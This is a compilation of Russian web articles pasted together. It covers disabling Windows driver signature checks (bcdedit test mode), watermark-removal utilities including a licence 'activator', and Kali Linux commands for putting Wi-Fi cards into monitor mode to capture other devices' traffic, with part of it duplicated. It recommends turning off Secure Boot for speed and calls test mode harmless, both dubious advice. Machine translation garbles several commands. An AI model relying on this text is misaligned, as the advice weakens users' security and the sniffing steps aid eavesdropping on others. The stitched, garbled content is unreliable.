После выполнения всех действий, надпись должна исчезнуть. Однако, в случае, если у пользователя установлены неподписанные драйвера, а других нет, то оборудование, для которого они были установлены, может перестать работать. В этом случае лучше будет не отключать режим до появления официальных утилит или же можно воспользоваться другим способом и просто скрыть надпись, не отключая сам режим.

Используем Universal Watermark Disabler

При использовании этого метода сам тестовый режим, как и все неподписанные драйвера, продолжит работать на компьютере, устранена будет только надпись, оповещающая о том, что он включен на устройстве. Для начала пользователю потребуется загрузить утилиту на свой компьютер, сделать это можно на сайте https://winaero.com/download.php?view.1794 . После этого будет необходимо запустить ее от имени администратора , появится такое окно, которое изображено ниже.

Останется нажать на install , после этого выскочит окно, в котором пользователя спросят о том, уверен ли он, что требуется запустить программу на непроверенной сборке, здесь следует согласиться.

Через некоторое время высветиться сообщение о том, что требуется перезагрузить компьютер, сразу после нажатия на ОК он будет перезапущен, так что стоит сначала сохранить всю работу.

При следующем старте системы надписи уже видно не будет. Однако, не стоит просто так держать режим включенным, все же, программы без цифровых подписей могут быть опасны и нести в себе вирусное ПО. Также, при включенном режиме можно установить себе непроверенные драйвера, из-за которых компьютер будет лагать и тормозить, потому что они просто не будут подходить для текущего оборудования или будут содержать ошибки.

Так что, при первой возможности стоит установить себе официальное программное обеспечение, которое обладает всеми нужными подписями, после чего, сразу же отключить тестовый режим и продолжить работать в обычном.

Вы не являетесь разработчиком или не проводите тестирования программных продуктов, драйверов или других элементов ПО, но у вас появилась надпись: «Тестовый режим» и номер сборки? Такое бывает, если вы нечаянно, при установке какой-то программы, выбрали разрешения на переход в тестовый режим, в который вошли после перезагрузки компьютера. Давайте разберем – как отключить тестовый режим в windows 7 и избавиться от надоедливой надписи в нижнем правом углу рабочего стола.

Возможно, переход в тестовый режим у вас осуществился после установки программы небольшого размера под названием OpenedFilesView. Когда она устанавливается, инсталлятор задает вопрос «Перейти ли в тестовый режим?» и пользователь, считая это бесполезным действием, соглашается. Когда система перезагрузилась, появилось следующее:

Как оказалось, проблема, если ее можно так назвать, решается достаточно легко. Все уже запомнили, что мы много раз в своих статьях использовали утилиту «Выполнить» — этот случай не исключение. Итак, переходим туда с помощью Win+R и вводим такую команду: bcdedit.exe -setTESTSIGNINGOFF.

После нажатия на «Ок» и перезагрузки, система выйдет из тестового режима. Но помните, если вам когда-то понадобится его включить обратно, нужно будет совершить те же действия, но вместо OFF использоватьON. Теперь вы убедились, что отключить тестовый режим windows 7 очень просто.

Похожие записи

Бывает отлучишься от компьютера, а потом приходишь, но он уже выключен. Начинаются нервные крики, паника от потерянной информации или важных документов, которые не были сохранены. Чтобы этого не было, необходимо узнать, как отключить спящий…

Пользователи персонального компьютера, которые имеют операционные системы 7, 8, 8.1 или 10 могут в процессе эксплуатации увидеть такого типа сообщения на мониторе: «Программа запущена в режиме совместимости». Многие, особенно неопытные, в…

Корпорация «Майкрософт» всегда старается удовлетворить потребности самых различных групп пользователей Windows. Начиная от рядовых юзеров, которым достаточно иметь в своём распоряжении стандартный набор инструментария ОС. И заканчивая продвинутыми «гиками», для которых самое главное — это постоянно быть в тренде последних программных новинок и электронных девайсов. Именно для таких «фанатов цифрового прогресса» в ОС Windows 10 разработчики усовершенствовали специальную функцию — «Тестовый режим».

Что такое «Тестовый режим» и в чём его предназначение

«Тестовый режим» — это разработанная функция для ОС Windows, которая позволяет переключить работу вашей системы с общедоступного (стандартного) режима на «специальный». Особенностью такого режима является то, что при его активации блокируются некоторые инструменты безопасности, а именно отключается так называемая «проверка цифровых подписей» для драйверов . В обычном режиме работы Windows такая «проверка» способна заблокировать установку некоторых программ, приложений, файлов обновления. Более того имеется вероятность, что пользователь не сможет корректно подключить внешний электронный девайс (смартфон, КПК, планшет и т.д.) к своему компьютеру. Поэтому переход на работу в «Тестовый режим» может стать действенным решением подобной проблемы.

Несмотря на то, что «Тестовый режим» отключает некоторые инструменты безопасности, вашей системе всё равно ничего не угрожает. Единственной проблемой может стать — некорректная работа устанавливаемых программ, приложений и обновлений без «цифровой подписи от Майкрософт».

Прежде чем перейти на работу в «Тестовом режиме», вам следует убедиться в том, что подобная возможность не заблокирована настройками «БИОС» (BIOS). Для этого:

Автор данной статьи заметил, что при включенном защитном режиме «Secure Boot» для блокировки функции «Тестовый режим», компьютер потребляет дополнительное количество ресурсов, благодаря активной работе соответствующего системного процесса (отображается в «Диспетчере задач»/«Процессы»). Поэтому для более быстрой работы вашего ПК желательно деактивировать «Secure Boot», даже если вы не планируете пользоваться «Тестовым режимом».

Теперь перейдём непосредственно к алгоритму активации «Тестового режима».

  1. Щёлкните по «Пуску», наберите в поисковой строке «cmd» и запустите «Командную строку» с правами администратора.
    Обязательно запускайте «Командную строку» от имени администратора, иначе внесённые в систему изменения могут не сработать
  2. Поочерёдно наберите, сначала: «bcdedit.exe -set loadoptions DISABLE_INTEGRITY_CHECKS» нажмите «Enter», а затем: «bcdedit.exe -set TESTSIGNING ON», также нажмите «Enter».
    Новую команду необходимо вводить только после появления надписи «Операция успешно завершена»
  3. Перезагрузитесь. Готово, «Тестовый режим» включен.
    После активации «Тестового режима», на вашем «Рабочем столе» появится соответствующее оповещение

Деактивация «Тестового режима»

Процесс деактивации «Тестового режима» практически идентичен его активации, с некоторым различием.


Видео: как деактивировать «Тестовый режим» через «Командную строку»

Системный сбой, или как удалить оповещение о «Тестовом режиме» на «Рабочем столе»

Не редко оповещение о «Тестовом режиме» может неожиданно появиться на «Рабочем столе», даже если вы его не активировали. Причиной может послужить либо системный сбой, либо автоматическая активация «Тестового режима» после загрузки и установки файлов обновления ОС . Если деактивация «Тестового режима» через «Командную строку» не помогает и соответствующее оповещение продолжает отображаться, то вам следует воспользоваться другими способами для устранения сложившейся проблемы.

При подобном сбое в строке оповещения также, чаще всего, имеется информация о версии сборки вашей ОС

Отключение оповещения с помощью «Строки задач»

Для того, чтобы избавиться от неожиданно появившегося оповещения, достаточно всего лишь выполнить пару шагов:


Удаление «ватермарки» при помощи Universal Watermark Disabler

Universal Watermark Disabler — это вспомогательная утилита для ОС Windows, позволяющая удалять с «Рабочего стола» любые «водяные знаки».

Из-за того, что официальный сайт разработчика программы больше не функционирует, вам придётся воспользоваться поисковой системой и скачать (на свой страх и риск) утилиту с любого «софтового сайта», который способен предложить такую возможность.

После скачивания Universal Watermark Disabler, вам необходимо:

  1. Запустить утилиту и кликнуть «Install».
    В стартовом окне инсталлятора также расположена информация о вашей системе
  2. Появится окно подтверждения установки, примите соглашение, нажав «Да».
    После подтверждения, установка начнётся автоматически
  3. По окончании инсталляции утилиты, закройте соответствующее оповещение и перезагрузитесь.
    После установки утилиты обязательно перезагрузите ПК
Видео: как удалить «ватермарку» с помощью Universal Watermark Disabler

Удаление «водяного знака» посредством My WCP Watermark Editor

Ещё одной действенной утилитой по «очистке» вашего «Рабочего стола» от оповещения «Тестовый режим» является My WCP Watermark Editor. Главная особенность этого программного обеспечения — оно работает автономно (т.е. без необходимости его установки на ПК) .

  1. Так как создатель My WCP Watermark Editor прекратил свою активную деятельность по разработке и обновлению утилиты, то вам остаётся лишь (под свою личную ответственность) искать и скачивать WCP со сторонних сайтов, распространяющих данное ПО для системы Windows.
  2. Откройте WCP, выставите маркер напротив «Remove all Watermark» и нажмите на «Apply new settings».
    Вы также можете вернуть «ватермарку» обратно, нажав на кнопку «Restore default settings»
  3. Дождитесь окончания процесса удаления «ватермарки», после чего выполните перезагрузку.
    После окончания процесса удаления «ватермарки» обязательно перезагрузите ПК

Если вы вдруг захотите вернуть «ватермарку», оповещающую об активном «Тестовом режиме» через My WCP Watermark Editor (выбрав соответствующий инструмент «Restore default settings»), то автор статьи хотел бы вас предостеречь. Дело в том, что «процесс восстановления» через данную утилиту не всегда срабатывает корректно, из-за чего могут произойти незначительные сбои в работе вашего ПК, а именно «Рабочего стола» (исходя из личного опыта например, может пропасть фон или некоторые иконки, сбиться время и дата).

Удаление «водяного знака» с помощью Re-Loader Activator

Данная утилита, в первую очередь является «активатором» лицензии для ОС Windows. Однако её функционал также способен помочь пользователям с удалением «водяного знака Тестового режима» Windows. Стоит отметить, что Re-Loader Activator является не самым надёжным ПО, поэтому принимайте решение по его использованию только после «взвешивания» соответствующих рисков.

Повторное обновления системы

Чаще всего «спонтанное» появление оповещения об активированном «Тестовом режиме» обусловлено системным сбоем при установке компонентов сборки обновления Windows . Решением возникшей проблемы — будет повторное обновление системы через «Центр обновления». Для этого:

  1. Сочетанием клавиш WIN+I откройте настройки «Параметры», перейдите в категорию «Обновление и безопасность».
    Настройки «Параметры» также можно открыть через меню «Пуск»
  2. Во вкладке «Центр обновления Windows» зайдите в «Журнал обновлений».
    В окне настроек «Центр обновления Windows» вы также можете увидеть информацию о времени последнего установленного пакета обновлений
  3. После этого щёлкните по строке «Удалить обновления».
    В «Журнале обновлений» вы также можете просматривать список установленных обновлений за всё время
  4. В появившемся окне «Удаления обновлений» выберите последний установленный пакет обновлений и нажмите на кнопку «Удалить».
    Удалять необходимо только последнее обновление системы
  5. Перезагрузите ПК, после чего вновь зайдите в «Центр обновления Windows» и нажмите на кнопку «Проверка наличия обновлений».
    После нажатия на кнопку проверки обновлений, процесс поиска и установки начнётся автоматически
  6. Дождитесь окончания процессов поиска и установки компонентов обновления, затем перезагрузите систему.
    После установки всех файлов обновления система перезагрузиться автоматически

«Тестовый режим» является полезным дополнительным режимом работы системы Windows 10. Благодаря ему пользователи способны не только без проблем устанавливать различного рода программное обеспечение (не имеющего такого инструмента безопасности, как «проверка цифровой подписи), но и также подключать к своему ПК всевозможные электронные девайсы и быть уверенными в их корректной работе.

Изначально «семерка» настроена таким образом, что не допускает к установке неподписанные драйвера. Это специальная защита системы. Убирается она в случае активации тестового режима Win 7.

Настройка тестового режима

Тестовый режим Виндовс 7 может включиться в результате установки какого-либо ПО, в инсталлятор которого встроен соответствующий скрипт. Рядовой пользователь легко заметит изменение в системе по надписи снизу экрана. Она небольших размеров, но все равно серьезно отвлекает.

В таком случае потребуется деактивация этой функции.

Но бывают и обратные ситуации, например, когда нужно поставить пользовательский софт. А сделать это невозможно без активации работы с неподписанными драйверами.

Отключение

Всех, кому мешает надпись на рабочем столе, заинтересует способ, как отключить тестовый режим в Windows 7. Делается это из Командной строки. Для ее запуска откройте «Пуск» , в полном списке найдите раздел «Стандартные» , там располагается нужный пункт. Нажмите по нему ПКМ, а затем «Запуск от…» .

В текстовом поле с мигающим курсором пропишите запрос bcdedit.exe -set loadoptions ENABLE_INTEGRITY_CHECKS , а затем нажмите Enter, после чего — bcdedit.exe -set TESTSIGNING OFF


Примечание: вставить текст не получится, нужно вбивать его вручную с клавиатуры.

Остается только перезагрузить систему.

Важно: если открыть командную строку без администраторских прав, то ввод команды будет сопровождаться сообщением «Отказано в доступе» . Это говорит о том, что вы пропустили пункт «Запуск от…» .

Активация

Активация тестового режима необходима для установки неподписанных драйверов, например, разработанных пользователями, которые требуются для синхронизации какого-либо устройства с компьютером. Но бывают и другие причины, при которых понадобится данная функция.

Вновь запустите Командную строку по инструкции из прошлого раздела. Опять активируйте первый запрос. Отобразится уведомление об успешности, затем пропишите bcdedit.exe -set TESTSIGNING ON

Facebook

Twitter

Вконтакте

Одноклассники

Google+

Использование режима монитора в Kali Linux 2020

Адаптеры Wi-Fi используются для подключения вашего устройства к Интернету. Большинство ноутбуков, планшетов и мобильных телефонов имеют встроенную карту Wi-Fi. В беспроводной среде данные передаются с устройства в Интернет в виде пакетов путем отправки запроса пакета на маршрутизатор. Маршрутизатор получает запрошенный пакет из Интернета, и как только он получает веб-страницу, он отправляет информацию обратно на ваше устройство в виде пакетов, тем самым контролируя весь трафик, идущий на подключенные устройства.Режим монитора в Kali Linux позволяет вам читать все пакеты данных, даже если они не отправляются через этот режим, и контролирует трафик, получаемый в беспроводных сетях. Режим мониторинга может захватывать все эти пакеты, которые направляются не только на их устройство, но и на другие устройства, подключенные к сети. В этой статье будет представлен обзор режима монитора в Kali Linux.

использует


Для этичного хакера режим монитора используется для захвата всех соответствующих пакетов данных, чтобы проверить, уязвим ли маршрутизатор.Он также используется для проверки уязвимости сети для любых атак. Таким образом, режим мониторинга предоставляет всю важную информацию о каждом устройстве, а также может использоваться для наблюдения за большими объемами сетевого трафика.

3 способа использования режима монитора Kali Linux

Если у вас есть беспроводной адаптер, поддерживающий режим монитора, вы можете легко настроить беспроводной интерфейс. В следующих разделах перечислены некоторые способы использования режима монитора в Kali Linux.

1. Включение режима монитора с помощью iw

Сначала мы рассмотрим использование инструмента настройки Wi-Fi iw .Он используется, в частности, для настройки Wi-Fi и может быть более мощным, чем другие инструменты. Возможно, вы уже использовали iw для нескольких других целей, например, для получения информации о вашей сети Wi-Fi. Фактически, этот инструмент может даже дать вам больше информации о различных командах. Список iw дает вам гораздо больше информации о беспроводной сети wlan0, режимах интерфейса, HT, скорости передачи данных, сканировании и т. Д.

Первый шаг — проверить информацию об интерфейсе. Вы можете сделать это, введя следующее:

Результат будет выглядеть как следующее окно:

Чтобы получить доступ к трафику других людей, вам необходимо переключить его в режим мониторинга.Вы можете переключить iw в режим монитора, введя следующие команды:

$ sudo ip link set IFACE down
$ sudo iw IFACE set monitor control
$ sudo ip link set IFACE up

IFACE заменил фактическое имя, как показано:

$ sudo ip link set wlan0 down
$ sudo iw wlan0 set monitor control
$ sudo ip link set wlan0 up

Следующий шаг — еще раз проверить беспроводной интерфейс, введя следующую команду:

Вывод вышеупомянутых команд можно увидеть в окне выше.

Не знаете, как вернуться в управляемый режим? Для этого введите следующие команды:

$ sudo ip link set IFACE down
$ sudo iw IFACE set type managed
$ sudo ip link set IFACE up

IFACE заменил фактическое имя, как показано:

$ sudo ip link set wlan0 down
$ sudo iw wlan0 set type managed
$ sudo ip link set wlan0 up

2. Включите режим монитора с помощью airmon-ng

Если вы уже пытались включить режим монитора с помощью iw и не смогли, то другой метод, который вы можете использовать для включения режима монитора, — это airmon-ng .

Первый шаг — получить информацию о вашем беспроводном интерфейсе. Сделайте это, введя следующую команду:

Результат выполнения вышеуказанной команды выглядит следующим образом:

Вам нужно остановить любой процесс, который может помешать использованию адаптера в режиме монитора. Для этого вы можете использовать программу под названием airmon-ng, просто введя следующие команды:

$ sudo airmon-ng проверить убить

Теперь вы должны включить режим монитора без каких-либо помех.

$ sudo airmon-ng start wlan0

Wlan0mon создан.

Используйте следующие команды, чтобы отключить режим монитора и вернуться в управляемый режим:

$ sudo airmon-ng stop wlan0mon

Введите следующую команду, чтобы перезапустить сетевой менеджер:

$ sudo systemctl start NetworkManager

3. Включите режим монитора с помощью iwconfig

Как и в предыдущих разделах, проверьте имя вашего интерфейса с помощью следующей команды:

Следующим шагом является включение режима монитора.Сделайте это, введя следующие команды:

$ sudo ifconfig IFACE down
$ sudo iwconfig IFACE mode monitor
$ sudo ifconfig IFACE up

Кроме того,

$ sudo ifconfig wlan0 down
$ sudo iwconfig монитор режима wlan0
$ sudo ifconfig wlan0 up

Отключить режим монитора

$ sudo ifconfig wlan0 down
$ sudo iwconfig управляемый режим wlan0
$ sudo ifconfig wlan0 up

Отключить диспетчер сети, предотвращающий режим монитора

$ sudo systemctl stop NetworkManager

Заключение

Включение режима монитора — отличный метод для отслеживания и слежки за вашей сетью и маршрутизатором.Есть несколько способов включить режим монитора. Не все методы подходят для каждого адаптера. Итак, попробуйте любой из перечисленных выше методов, если ваш адаптер работает не так, как ожидалось.

Как проверить, поддерживает ли ваш беспроводной адаптер режим монитора

Если вы только начинаете анализ пакетов и тестирование на проникновение, наиболее важным шагом является определение того, поддерживает ли ваша карта Wi-Fi неразборчивый или контролирующий режим. Обычно режим монитора отключен на встроенной карте Wi-Fi, предоставленной производителем настольного компьютера или ноутбука.Но, прежде чем вы потратите 30 долларов на USB-адаптер Wi-Fi, просто проверьте, поддерживает ли существующий режим монитора. В этой заметке вот как проверить, поддерживает ли ваша WiFi-карта режим монитора в Windows, Ubuntu и macOS.

Проверьте, поддерживает ли беспроводной адаптер режим монитора

1. Windows

В Windows нет прямой команды для проверки или включения режима монитора на вашей карте Wi-Fi. Следовательно, нам нужно будет прибегнуть к инструменту под названием Microsoft Network Monitor. Это официальный инструмент, разработанный Microsoft, но в настоящее время он находится в архиве.Однако он полностью совместим для работы на компьютере с Windows 10.

Загрузите и установите средство MS Network Monitor. После этого вам необходимо перезагрузить систему, чтобы инструмент обнаружил сетевые карты. Затем запустите приложение и на начальной странице нажмите «New Capture».

На вкладке New Capture мы хотим, чтобы только карта Wi-Fi прослушивала пакеты. Для этого нажмите на кнопку «Настройки захвата» на верхней панели инструментов.

В диалоговом окне настроек снимите все флажки, кроме Wi-Fi, и нажмите кнопку «Закрыть».Это необходимо для того, чтобы карта Wi-Fi слушала только сетевой трафик.

Выполните настройку, нажмите кнопку «Пуск», чтобы начать захват пакетов.

Если вы получаете сообщение об ошибке, это означает, что ваша карта Wi-Fi не поддерживает режим монитора. Между тем, если пакеты захватываются успешно, это означает, что ваша карта Wi-Fi поддерживает режим мониторинга.

В качестве альтернативы вы также можете сделать то же самое с помощью инструмента мониторинга сети Wireshark.

Загрузить Microsoft Network Monitor

2. macOS

Для macOS вы можете проверить режим монитора карты Wi-Fi через терминал с помощью инструмента tcpdump. Однако этот процесс немного утомителен, поэтому мы пойдем путем графического интерфейса. Для этого запустите инструмент диагностики беспроводной сети из поиска Spotlight.

Кроме того, вы можете щелкнуть значок Wi-Fi на панели инструментов, удерживая нажатой клавишу выбора, и выбрать «Открыть беспроводную диагностику» в раскрывающемся меню.

После запуска инструмента беспроводной диагностики нажмите ⌘ + ⌥ +6, чтобы открыть окно Sniffer. Кроме того, вы также можете сделать то же самое, щелкнув меню «Окно» на панели инструментов и щелкнув «Sniffer».

Во всплывающем окне сниффера вы увидите опцию «Каналы и ширина канала». На данный момент мы будем использовать параметры по умолчанию. Нажмите кнопку «Пуск», чтобы инструмент Sniffer начал сканирование. В зависимости от ваших настроек вам может потребоваться ввести учетные данные вашего Mac для аутентификации.

Прочтите: 6 лучших альтернатив Wireshark для Windows и macOS

Если сниффер работает успешно, вы увидите, что ваш Wi-Fi отключен. Если вы нажмете на значок Wi-Fi в правом верхнем углу, вы увидите, что ваш Wi-Fi находится в режиме мониторинга. Это означает, что ваш Wi-Fi поддерживает режим монитора. Если сниффер выдает ошибку, это означает, что ваш Wi-Fi не поддерживает режим мониторинга.

Когда Wi-Fi находится в режиме монитора, вы не будете подключены к Интернету.Чтобы получить доступ к Интернету, остановите инструмент Sniffer.

Когда вы завершаете работу с инструментом Sniffer, он создает файл «.pcap» в папке / var / tmp со всеми записанными за это время пакетами. Вы можете просмотреть файл, используя следующую команду.

 tcpdump -r /path/to/packetfile.pcap 

3. Ubuntu

В Ubuntu это довольно просто и не требует установки каких-либо дополнительных инструментов. Прежде всего, нам нужно найти имя интерфейса адаптера Wi-Fi.Для этого используйте следующую команду

 ip a 

Эта команда отобразит все сетевые интерфейсы в вашей системе. Поскольку я подключен к Интернету через Wi-Fi, вы можете видеть IP-адрес и состояние UP. Итак, мое имя интерфейса Wi-Fi — «wlp3s0».

Когда у нас есть имя интерфейса, нам нужно выключить Wi-Fi. Для этого используйте следующую команду.

 sudo ip link set dev wlp3s0 вниз 

Замените wlp3s0 своим именем интерфейса Wi-Fi.

Теперь, когда у нас отключен интерфейс, мы можем переключить карту Wi-Fi в режим мониторинга. Для этого выполните следующую команду

 монитор режима sudo iwconfig wlp3s0 

Поскольку моя карта Wi-Fi поддерживает режим монитора, команда выполнена успешно. Если на вашей карте Wi-Fi не включен режим монитора, команда завершится ошибкой. Чтобы перепроверить, нажмите следующую команду.

 iwconfig 

Если последняя команда была успешной, карта Wi-Fi должна находиться в режиме мониторинга.В противном случае ваша карта Wi-Fi будет отображаться в «Управляемом режиме», и она не поддерживает режим мониторинга.

Пока ваш Wi-Fi находится в режиме мониторинга, он будет отключен, и вы не сможете получить доступ к Интернету. Чтобы вернуть его в управляемый режим и включить, используйте следующую команду.

 sudo iwconfig режим wlp3s0 управляемый
sudo ip link set dev wlp3s0 вверх 

Заключение

После того, как вы проверили, поддерживает ли ваш Wi-Fi режим монитора, вы можете продолжить анализ и тестирование сети.У нас есть специальная статья о лучших инструментах мониторинга сети с открытым исходным кодом для Windows и Linux, обязательно проверьте это. Кстати, Windows 10 и macOS не предназначены для использования в качестве сетевого сервера или анализатора безопасности. Так что в конечном итоге вам придется перейти на Kali Linux или Parrot OS.

Если описанные выше методы вам не подходят, это означает, что ваша карта Wi-Fi не поддерживает режим монитора. В таком случае вы можете приобрести USB-адаптер Wi-Fi примерно за 30 долларов. Я бы порекомендовал Alfa AWUSO36NH, Alfa AWUS036NHA или Realtek RTL8812AU.

Большинство смартфонов Android поддерживают режим монитора прямо из коробки, однако вам потребуется root-доступ и такие приложения, как zAnti или cSploit, для прослушивания пакетов данных в сети. Вот хорошая статья, с которой вы начнете.

С другой стороны, iPhone

, скорее всего, не поддерживает режим монитора даже после взлома. Поэтому лучшее, что вы можете сделать, — это перехватить трафик к себе и от себя, а не от других устройств в сети.

Между тем, в Ubuntu вы можете проводить расширенный анализ и тестирование, устанавливая терминальные сетевые инструменты, такие как Aircrack-ng, hcxtools и т. Д.Если у вас возникнут дополнительные вопросы или проблемы, дайте мне знать в комментариях ниже.

Также читайте: 5 лучших инструментов сетевого мониторинга для Windows

Как проверить, поддерживает ли ваш беспроводной адаптер режим монитора

Как проверить, поддерживает ли ваш беспроводной адаптер режим монитора.

Если вы только начинаете работу с анализом пакетов и тестированием на проникновение, наиболее важным шагом является определение того, поддерживает ли ваша карта Wi-Fi неразборчивый или контролируемый режим.Обычно режим монитора отключен на встроенной карте Wi-Fi, предоставляемой производителем настольного компьютера или ноутбука. Но, прежде чем тратить 30 долларов на USB-адаптер Wi-Fi, просто проверьте, поддерживает ли его существующий режим монитора. В этом посте вы узнаете, как проверить, поддерживает ли ваша WiFi-карта режим монитора в Windows, Ubuntu и macOS.

Проверьте, поддерживает ли ваш беспроводной адаптер режим монитора

1. Windows

В Windows нет прямой команды для проверки или включения режима монитора на вашей карте Wi-Fi.Следовательно, нам нужно будет прибегнуть к инструменту под названием Microsoft Network Monitor. Это официальный инструмент, разработанный Microsoft, но в настоящее время он находится в архиве. Однако он полностью совместим с компьютером с Windows 10.

Загрузите и установите средство MS Network Monitor. После этого необходимо перезагрузить систему, чтобы инструмент обнаружил сетевые карты. Затем запустите приложение и нажмите New Capture на стартовой странице.

На вкладке New Capture мы хотим, чтобы только карта Wi-Fi прослушивала пакеты.Для этого нажмите кнопку «Настройки захвата» на верхней панели инструментов.

В диалоговом окне «Настройки» снимите все флажки, кроме Wi-Fi, и нажмите «Закрыть». Это необходимо для того, чтобы карта Wi-Fi слушала только сетевой трафик.

Опубликуйте настройку, нажмите кнопку «Пуск», чтобы начать сбор пакетов.

Если вы получаете сообщение об ошибке, это означает, что ваша карта Wi-Fi не поддерживает режим монитора. Между тем, если пакеты захватываются успешно, это означает, что ваша Wi-Fi-карта поддерживает режим мониторинга.

В качестве альтернативы вы также можете сделать то же самое с помощью инструмента мониторинга сети Wireshark.

Загрузить Microsoft Network Monitor

2. macOS

В macOS вы можете проверить режим монитора карты Wi-Fi через терминал с помощью инструмента tcpdump. Однако этот процесс немного утомителен, поэтому мы пойдем путем графического интерфейса. Для этого запустите средство диагностики беспроводной сети из поиска Spotlight.

Кроме того, вы можете щелкнуть значок Wi-Fi на панели инструментов, удерживая нажатой кнопку «Выбрать», и выбрать «Открыть беспроводную диагностику» в раскрывающемся меню.

После запуска средства диагностики беспроводной сети нажмите ⌘ + ⌥ +6, чтобы открыть окно Sniffer. Кроме того, вы также можете сделать то же самое, щелкнув меню «Окно» на панели инструментов и нажав «Сниффер».

Во всплывающем окне сниффера вы увидите опцию «Каналы и ширина канала». На данный момент мы будем использовать параметры по умолчанию. Нажмите кнопку «Пуск», чтобы инструмент Sniffer начал сканирование. В зависимости от ваших настроек вам может потребоваться ввести учетные данные Mac для аутентификации.

Чтение: Могу ли я увидеть, что другие делают в моей сети

Если сниффер работает успешно, вы увидите, что ваш Wi-Fi отключен. Если вы щелкните значок Wi-Fi в правом верхнем углу, вы увидите, что ваш Wi-Fi находится в режиме мониторинга. Это означает, что ваш Wi-Fi поддерживает режим монитора. Если сниффер выдает ошибку, значит, ваш Wi-Fi не поддерживает режим мониторинга.

Когда Wi-Fi находится в режиме монитора, вы не будете подключены к Интернету.Остановите инструмент Sniffer для доступа в Интернет.

Когда вы закончите работу с инструментом Sniffer, он создает файл «.pcap» в папке / var / tmp со всеми пакетами, записанными за это время. Вы можете просмотреть файл, используя следующую команду. tcpdump -r /path/to/packetfile.pcap

3. Ubuntu

В Ubuntu этот процесс довольно прост и не требует установки каких-либо дополнительных инструментов. Прежде всего, нам нужно найти имя интерфейса адаптера Wi-Fi.Для этого используйте следующую команду ip a

Эта команда отобразит все сетевые интерфейсы в вашей системе. Поскольку я подключен к Интернету через Wi-Fi, вы можете видеть IP-адрес и статус UP. Итак, мое имя интерфейса Wi-Fi — «wlp3s0».

Когда у нас есть имя интерфейса, нам нужно выключить Wi-Fi. Для этого используйте следующую команду. sudo ip link set dev wlp3s0 вниз

Замените wlp3s0 именем вашего интерфейса Wi-Fi.

Теперь, когда мы отключили интерфейс, мы можем переключить карту Wi-Fi в режим мониторинга.Для этого выполните следующую команду sudo iwconfig wlp3s0 mode monitor

Поскольку моя карта Wi-Fi поддерживает режим монитора, команда выполнена успешно. Если на вашей карте Wi-Fi не включен режим мониторинга, команда не будет выполнена. Чтобы перепроверить, нажмите следующую команду. iwconfig

Если последняя команда была успешной, карта Wi-Fi должна находиться в режиме мониторинга. В противном случае ваша Wi-Fi-карта будет отображаться в «Управляемом режиме» и не будет поддерживать режим мониторинга.

Пока ваш Wi-Fi находится в режиме мониторинга, он будет отключен, и вы не сможете получить доступ к Интернету.Чтобы вернуть его в управляемый режим и включить его, используйте следующую команду. sudo iwconfig управляемый режим wlp3s0 sudo ip link set dev wlp3s0 up

Упаковка

После того, как вы проверили, поддерживает ли ваш Wi-Fi режим мониторинга, вы можете продолжить анализ и тестирование сети. У нас есть специальная статья о лучших инструментах мониторинга сети с открытым исходным кодом для Windows и Linux, обязательно ознакомьтесь с ней. Кстати, Windows 10 и macOS не предназначены для использования в качестве сетевого сервера или анализатора безопасности.Так что в конечном итоге вам придется перейти на Kali Linux или Parrot OS.

Если описанные выше методы не работают для вас, значит, ваша карта Wi-Fi не поддерживает режим монитора. В этом случае вы можете получить USB-адаптер Wi-Fi примерно за 30 долларов. Я бы порекомендовал Alfa AWUSO36NH, Alfa AWUS036NHA или Realtek. RTL8812AU.

Большинство смартфонов Android поддерживают режим монитора «из коробки», однако вам потребуется root-доступ и такие приложения, как zAnti или cSploit, для прослушивания пакетов данных в сети. Вот хорошая статья для начала.

С другой стороны, iPhone, скорее всего, не поддерживает режим монитора даже после взлома. Поэтому лучшее, что вы можете сделать, — это перехватить трафик к себе и от себя, а не от других устройств в сети.

Между тем, в Ubuntu вы можете выполнить расширенный уровень анализа и тестирования, установив терминальные сетевые инструменты, такие как Aircrack-ng, шестнадцатеричные инструменты и т. Д. Если у вас есть какие-либо дополнительные вопросы или проблемы, дайте мне знать в комментариях ниже.

Также читайте: Почему Ntoskrnl.Exe вызывает высокую загрузку ЦП и как это исправить

Как проверить, поддерживает ли ваш беспроводной адаптер режим монитора

Как проверить, поддерживает ли ваш беспроводной адаптер режим монитора

Просмотры сообщений: 1,293

Связанные

Как проверить, поддерживает ли ваш адаптер беспроводной сети режим монитора и внедрение пакетов «Null Byte :: WonderHowTo

Чтобы взломать сеть Wi-Fi, вам понадобится карта беспроводной связи, поддерживающая режим мониторинга и внедрение пакетов.Не все беспроводные карты могут это сделать, но вы можете быстро протестировать уже имеющуюся у вас на совместимость и убедиться, что набор микросхем внутри адаптера, который вы собираетесь купить, будет работать для взлома Wi-Fi.

Беспроводные карты, поддерживающие режим мониторинга и внедрение пакетов, позволяют этичному хакеру прослушивать другие разговоры по Wi-Fi и даже внедрять вредоносные пакеты в сеть. Карты беспроводной связи в большинстве ноутбуков не очень хороши для чего-либо, кроме того, что требуется для установления базового соединения Wi-Fi.

Хотя некоторые внутренние карты могут предлагать некоторую поддержку режима монитора, чаще обнаруживается, что ваша карта не поддерживается инструментами, включенными в Kali Linux. Я нашел карту в ноутбуке Lenovo, который я использую для поддержки обоих, поэтому иногда можно сэкономить, используя внутреннюю карту ноутбука для практики, когда это необходимо. Если внутренний не поддерживает режимы, потребуется внешний.

Внешние сетевые адаптеры в среднем составляют от 15 до 40 долларов за карту. Хотя это может показаться не таким уж большим, ошибка при покупке сетевого адаптера может быстро накапливаться и разочаровывать при первом знакомстве с безопасностью Wi-Fi.

Эти устройства сначала могут показаться немного сложными, но они довольно просты. В каждом беспроводном сетевом адаптере есть микросхема, содержащая собственный ЦП. Этот чип вместе с другими схемами адаптера преобразует сигналы вашего компьютера в радиоимпульсы, называемые «пакетами», которые передают информацию между устройствами. Для выбора адаптера Wi-Fi вам необходимо знать несколько вещей, таких как набор микросхем внутри, используемая антенна и типы Wi-Fi, которые поддерживает карта.

Перейти к разделу: Проверить карточку перспективы | Проверить существующую карту | Попробуйте атаковать, чтобы убедиться, что она работает

Вариант 1. Проверьте набор микросхем адаптера перед покупкой

Если вы еще не приобрели рассматриваемую беспроводную сетевую карту, вы можете проверить ее несколькими способами. чтобы узнать, поддерживает ли он режим монитора и внедрение пакетов, прежде чем совершать покупку. Однако, прежде чем мы углубимся в них, вам нужно знать разницу между производителями, чтобы не было путаницы.

Идентификация продавца карты

Продавцом, как вы понимаете, является производитель, продающий сетевой адаптер. Примеры включают TP-link, Panda Wireless или Alfa. Эти производители несут ответственность за физическую компоновку и конструкцию адаптера, но не производят фактический процессор, который устанавливается внутри адаптера.

Идентификация производителя микросхем

